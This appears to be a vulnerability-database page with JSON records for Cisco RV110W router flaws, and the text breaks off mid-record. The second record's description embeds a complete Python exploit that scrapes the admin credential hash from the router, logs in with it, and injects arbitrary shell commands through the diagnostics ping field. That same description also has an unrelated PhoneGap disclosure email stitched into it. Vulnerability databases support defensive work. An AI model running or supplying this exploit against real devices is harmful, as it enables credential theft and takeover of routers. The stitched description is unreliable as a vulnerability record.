Search

Find a vulnerability

Search criteria

    133 vulnerabilities found for rv110w by cisco

    VAR-201607-0543

    Vulnerability from variot - Updated: 2025-04-13 23:27

    Buffer overflow in the web-based management interface on Cisco RV110W devices with firmware through 1.2.1.4, RV130W devices with firmware through 1.0.2.7, and RV215W devices with firmware through 1.3.0.7 allows remote authenticated users to cause a denial of service (device reload) via a crafted HTTP request, aka Bug ID CSCux86669. Cisco RV110W , RV130W and RV215W Wireless-N VPN The device firmware contains a buffer overflow vulnerability. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a denial-of-service vulnerability. Attackers can exploit this issue to reload the affected device, denying service to legitimate users. This issue is being tracked by Cisco bug IDs CSCux86664, CSCux86669 and CSCux86675

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201607-0543",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.2.0.15"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.0.1.3"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.1.0.5"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.3.0.7"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.2.0.14"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.1.0.9"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.2.1.4"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.2.0.9"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.2.0.10"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.6,
            "vendor": "cisco",
            "version": "1.0.0.21"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.1.0.6"
          },
          {
            "model": "rv130w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.2.7"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.2.1.4"
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.0.2.7"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.3.0.7"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv130w wireless-n multifunction vpn router",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.6,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv110w_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv130w_wireless-n_multifunction_vpn_router_firmware",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/o:cisco:rv215w_firmware",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Cisco would like to thank security researcher Samuel Huntley for finding and reporting this vulnerability.",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2016-1398",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.0,
                "id": "CVE-2016-1398",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 1.8,
                "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "CNVD",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.0,
                "id": "CNVD-2016-04097",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.6,
                "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "SINGLE",
                "author": "VULHUB",
                "availabilityImpact": "COMPLETE",
                "baseScore": 6.8,
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 8.0,
                "id": "VHN-90217",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "MEDIUM",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:S/C:N/I:N/A:C",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 6.5,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 2.8,
                "id": "CVE-2016-1398",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "LOW",
                "scope": "UNCHANGED",
                "trust": 1.8,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2016-1398",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2016-1398",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNVD",
                "id": "CNVD-2016-04097",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201606-365",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-90217",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "db": "VULHUB",
            "id": "VHN-90217"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer overflow in the web-based management interface on Cisco RV110W devices with firmware through 1.2.1.4, RV130W devices with firmware through 1.0.2.7, and RV215W devices with firmware through 1.3.0.7 allows remote authenticated users to cause a denial of service (device reload) via a crafted HTTP request, aka Bug ID CSCux86669. Cisco RV110W , RV130W and RV215W Wireless-N VPN The device firmware contains a buffer overflow vulnerability. The Cisco RV130WWireless-N is a versatile VPN router; the Cisco RV110W/RV215W is a router that combines wired/wireless network connectivity, VPN, and firewall. Multiple Cisco Products are prone to a denial-of-service vulnerability. \nAttackers can exploit this issue to reload the affected device, denying service to legitimate users. \nThis issue is being tracked by Cisco bug IDs  CSCux86664, CSCux86669 and CSCux86675",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2016-1398"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "db": "BID",
            "id": "91218"
          },
          {
            "db": "VULHUB",
            "id": "VHN-90217"
          }
        ],
        "trust": 2.52
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2016-1398",
            "trust": 3.4
          },
          {
            "db": "SECTRACK",
            "id": "1036115",
            "trust": 1.1
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417",
            "trust": 0.8
          },
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365",
            "trust": 0.6
          },
          {
            "db": "BID",
            "id": "91218",
            "trust": 0.4
          },
          {
            "db": "VULHUB",
            "id": "VHN-90217",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "db": "VULHUB",
            "id": "VHN-90217"
          },
          {
            "db": "BID",
            "id": "91218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "id": "VAR-201607-0543",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "db": "VULHUB",
            "id": "VHN-90217"
          }
        ],
        "trust": 1.2914166040000001
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "Network device"
            ],
            "sub_category": null,
            "trust": 0.6
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          }
        ]
      },
      "last_update_date": "2025-04-13T23:27:25.152000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-20160615-rv3",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20160615-rv3"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.9
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-90217"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 1.7,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv3"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id/1036115"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1398"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1398"
          },
          {
            "trust": 0.6,
            "url": "http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160615-rv3/"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/"
          }
        ],
        "sources": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "db": "VULHUB",
            "id": "VHN-90217"
          },
          {
            "db": "BID",
            "id": "91218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "db": "VULHUB",
            "id": "VHN-90217"
          },
          {
            "db": "BID",
            "id": "91218"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          },
          {
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2016-06-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "date": "2016-07-03T00:00:00",
            "db": "VULHUB",
            "id": "VHN-90217"
          },
          {
            "date": "2016-06-15T00:00:00",
            "db": "BID",
            "id": "91218"
          },
          {
            "date": "2016-07-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "date": "2016-06-16T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          },
          {
            "date": "2016-07-03T21:59:07.680000",
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2016-06-17T00:00:00",
            "db": "CNVD",
            "id": "CNVD-2016-04097"
          },
          {
            "date": "2017-09-01T00:00:00",
            "db": "VULHUB",
            "id": "VHN-90217"
          },
          {
            "date": "2016-06-15T00:00:00",
            "db": "BID",
            "id": "91218"
          },
          {
            "date": "2016-07-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          },
          {
            "date": "2016-07-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2016-1398"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural  Cisco Wireless-N VPN Device firmware buffer overflow vulnerability",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2016-003417"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer overflow",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201606-365"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201403-0204

    Vulnerability from variot - Updated: 2025-04-13 23:21

    The web management interface on the Cisco RV110W firewall with firmware 1.2.0.9 and earlier, RV215W router with firmware 1.1.0.5 and earlier, and CVR100W router with firmware 1.0.1.19 and earlier does not prevent replaying of modified authentication requests, which allows remote attackers to obtain administrative access by leveraging the ability to intercept requests, aka Bug IDs CSCul94527, CSCum86264, and CSCum86275. Vendors have confirmed this vulnerability Bug ID CSCul94527 , CSCum86264 ,and CSCum86275 It is released as.Administrative access may be obtained by using a function to intercept requests by a third party. Cisco RV Series Routers are router devices developed by Cisco. The vulnerability is due to the failure to properly process the authentication request. The attacker can manipulate the special POST data, bypass the login page of the management interface, and gain administrator access and obtain the management password. An attacker can exploit this issue to perform man-in-the-middle attacks and disclose sensitive information. Successful exploits may lead to other attacks. This issue is being tracked by Cisco bug IDs CSCul94527, CSCum86264, and CSCum86275. A remote attacker could exploit this vulnerability to gain administrative-level privileges. The following versions are affected: Cisco RV110W routers with firmware 1.2.0.9 and earlier, RV215W routers with firmware 1.1.0.5 and earlier, and CVR100W routers with firmware 1.0.1.19 and earlier. #!/usr/bin/env python2

    Cisco RV110W Password Disclosure and OS Command Execute.

    Tested on version: 1.1.0.9 (maybe useable on 1.2.0.9 and later.)

    Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute

    Date: 2018-08

    Exploit Author: RySh

    Vendor Homepage: https://www.cisco.com/

    Version: 1.1.0.9

    Tested on: RV110W 1.1.0.9

    CVE : CVE-2014-0683, CVE-2015-6396

    import os import sys import re import urllib import urllib2 import getopt import json

    import ssl

    ssl._create_default_https_context = ssl._create_unverified_context

    Usage: ./{script_name} 192.168.1.1 443 "reboot"

    if name == "main": IP = argv[1] PORT = argv[2] CMD = argv[3]

    # Get session key, Just access index page. 
    url = 'https://' + IP + ':' + PORT + '/'
    req = urllib2.Request(url)
    result = urllib2.urlopen(req)
    res = result.read()
    
    # parse 'admin_pwd'! -- Get credits
    admin_user = re.search(r'.*(.*admin_name=\")(.*)\"', res).group().split("\"")[1]
    admin_pwd = re.search(r'.*(.*admin_pwd=\")(.{32})', res).group()[-32:]
    print "Get Cred. Username = " + admin_user + ", PassHash = " + admin_pwd
    
    # Get session_id by POST
    req2 = urllib2.Request(url + "login.cgi")
    req2.add_header('Origin', url)
    req2.add_header('Upgrade-Insecure-Requests', 1)
    req2.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req2.add_header('User-Agent',
                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req2.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req2.add_header('Referer', url)
    req2.add_header('Accept-Encoding', 'gzip, deflate')
    req2.add_header('Accept-Language', 'en-US,en;q=0.9')
    req2.add_header('Cookie', 'SessionID=')
    data = {"submit_button": "login",
            "submit_type": "",
            "gui_action": "",
            "wait_time": "0",
            "change_action": "",
            "enc": "1",
            "user": admin_user,
            "pwd": admin_pwd,
            "sel_lang": "EN"
            }
    r = urllib2.urlopen(req2, urllib.urlencode(data))
    resp = r.read()
    login_st = re.search(r'.*login_st=\d;', resp).group().split("=")[1]
    session_id = re.search(r'.*session_id.*\";', resp).group().split("\"")[1]
    
    # Execute your commands via diagnose command parameter, default command is `reboot`
    req3 = urllib2.Request(url + "apply.cgi;session_id=" + session_id)
    req3.add_header('Origin', url)
    req3.add_header('Upgrade-Insecure-Requests', 1)
    req3.add_header('Content-Type', 'application/x-www-form-urlencoded')
    req3.add_header('User-Agent',
                    'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko)')
    req3.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8')
    req3.add_header('Referer', url)
    req3.add_header('Accept-Encoding', 'gzip, deflate')
    req3.add_header('Accept-Language', 'en-US,en;q=0.9')
    req3.add_header('Cookie', 'SessionID=')
    data_cmd = {"submit_button": "Diagnostics",
            "change_action": "gozila_cgi",
            "submit_type": "start_ping",
            "gui_action": "",
            "traceroute_ip": "",
            "commit": "1",
            "ping_times": "3 |" + CMD + "|",
            "ping_size": "64",
            "wait_time": "4",
            "ping_ip": "127.0.0.1",
            "lookup_name": ""
            }
    r = urllib2.urlopen(req3, urllib.urlencode(data_cmd))
    

    . The following email was sent to Apache Cordova/PhoneGap on 12/13/2013, and again on 1/17/2014. As there has been no response, we are re-posting it here to alert the general public of the inherent vulnerabilities in Apache Cordova/PhoneGap.

    Dear PhoneGap contributors,

    PhoneGap\x92s domain whitelisting for accessing native resources is broken and can be bypassed. These vulnerabilities can be exploited by any third-party domain loaded inside an iframe (e.g., malicious ad scripts). Below, we give a brief summary of the vulnerabilities. You can find more details in the paper http://www.cs.utexas.edu/~shmat/shmat_ndss14nofrak.pdf.

    1. Domain whitelisting on Android (before API 11) and Windows Phone 7 and 8 relies on the URL interception call that does not intercept iframe and XMLHttpRequest URLs. Consequently, it does not restrict which domains can be loaded in iframes. Any script inside an iframe can directly use PhoneGap\x92s internal JavaScript interfaces to the Java objects and access native resources: for example, by calling execute = cordova.require('cordova/exec'); var opts = cordova.require ('cordova/plugin/ ContactFindOptions' ); and directly operating on these objects.

    2. A malicious script running in an iframe can dynamically choose any of PhoneGap\x92s vulnerable bridge mechanisms at runtime (e.g. addJavascriptInterface or loadUrl on Android) and use it to bypass the domain whitelist. We call this the chosen-bridge attack.

    3. PhoneGap\x92s whitelisting check on Android is incorrect - it misses an anchor at the end of the regular expression: this.whiteList.add(Pattern.compile("\x88https?://(.*\.)?" + origin));

    For example, if foo.com is whitelisted, foo.com.evil.com will pass the check.

    1. PhoneGap\x92s domain whitelisting on Android (API 11 or highler) and iOS does not adhere to the same-origin policy. Third-party scripts included using tags are blocked unless their source domain is whitelisted, even though these scripts execute in the origin of the hosting page, not their source origin.

    2. Instead of just blocking access to bridges from non-whitelisted domains, PhoneGap completely blocks these domains from being loaded in the browser. This prevents ad-supported apps from displaying third-party ads and destroys the look-and-feel of many Web pages.

    We have a proof-of-concept implementation (a 400-line patch for PhoneGap 2.9.0 on Android) called NoFrak [https://github.com/georgiev-martin/NoFrak] which fixes these vulnerabilities. NoFrak does not allow Web content from non-whitelisted domains to access native resources but still displays it correctly in the browser. If you are interested in discussing how to merge NoFrak or some parts of NoFrak to PhoneGap\x92s main branch, please let us know.

    Thanks,

    Martin, Suman, and Vitaly

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201403-0204",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "cvr100w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "cvr100w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.1.19"
          },
          {
            "model": "rv110w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.1.0.5"
          },
          {
            "model": "rv110w",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.2.0.9"
          },
          {
            "model": "cvr100w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "cvr100w wireless-n vpn router",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.0.1.19"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.2.0.9"
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "rv215w wireless-n vpn router",
            "scope": "lte",
            "trust": 0.8,
            "vendor": "cisco",
            "version": "1.1.0.5"
          },
          {
            "model": "rv110w wireless-n vpn firewall",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "cisco",
            "version": "1.2.0.9"
          },
          {
            "model": "rv215w",
            "scope": "eq",
            "trust": 0.6,
